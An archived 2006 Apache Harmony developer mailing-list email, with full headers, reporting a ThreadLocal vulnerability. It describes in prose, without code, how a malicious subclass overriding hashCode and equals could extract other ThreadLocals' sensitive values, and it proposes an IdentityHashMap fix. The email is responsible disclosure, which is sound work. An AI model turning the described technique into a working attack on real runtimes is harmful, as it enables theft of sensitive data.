Return-Path: Delivered-To: apmail-incubator-harmony-dev-archive@www.apache.org Received: (qmail 76997 invoked from network); 17 Nov 2006 11:17:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (140.211.11.2) by minotaur.apache.org with SMTP; 17 Nov 2006 11:17:18 -0000 Received: (qmail 11570 invoked by uid 500); 17 Nov 2006 11:17:25 -0000 Delivered-To: apmail-incubator-harmony-dev-archive@incubator.apache.org Received: (qmail 11527 invoked by uid 500); 17 Nov 2006 11:17:24 -0000 Mailing-List: contact harmony-dev-help@incubator.apache.org; run by ezmlm Precedence: bulk List-Help: List-Unsubscribe: List-Post: List-Id: Reply-To: harmony-dev@incubator.apache.org Delivered-To: mailing list harmony-dev@incubator.apache.org Received: (qmail 11518 invoked by uid 99); 17 Nov 2006 11:17:24 -0000 Received: from herse.apache.org (HELO herse.apache.org) (140.211.11.133) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 17 Nov 2006 03:17:24 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [212.159.14.132] (HELO pih-relay05.plus.net) (212.159.14.132) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 17 Nov 2006 03:17:11 -0800 Received: from [87.112.24.154] (helo=[192.168.0.2]) by pih-relay05.plus.net with esmtp (Exim) id 1Gl1iB-0000RU-4Z for harmony-dev@incubator.apache.org; Fri, 17 Nov 2006 11:16:48 +0000 Message-ID: <455D9A52.2020407@tackline.plus.com> Date: Fri, 17 Nov 2006 11:17:38 +0000 From: Thomas Hawtin User-Agent: Thunderbird 1.5.0.4 (X11/20060602) MIME-Version: 1.0 To: harmony-dev@incubator.apache.org Subject: [drlvm][kernel_classes] ThreadLocal vulnerability Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org I had a quick browse through the Harmony SVN and spotted what appears to be a vulnerability in the java.lang.ThreadLocal implementation. I have briefly discussed this with Tim Ellison and Geir Magnusson Jr., off list before posting here. Harmony uses a per Thread HashMap (WeakHashMap in classlibadapter) to map ThreadLocals onto values. HashMaps (should) check for equality with Object.equals and Object.hashCode instead of == and System.identityHashCode. Malicious subclasses of ThreadLocal can override hashCode to run through all possible hash codes, extracting all the ThreadLocals present in the current thread through an overridden equals. Some of these ThreadLocals may contain sensitive values. Even if Harmony generates identity hash codes entirely at random, the process should be completable in the order of a few minutes of CPU time. Tim Ellison suggests replacing the HashMap with an IdentityHashMap. I agree that this would fix the security vulnerability. Some modern code, such as I believe Spring, creates many ThreadLocal instances, so you may wish to look further at quality of implementation issues. FWIW, I believe early versions of Sun's 1.3 J2SE suffered a similar problem. Tom Hawtin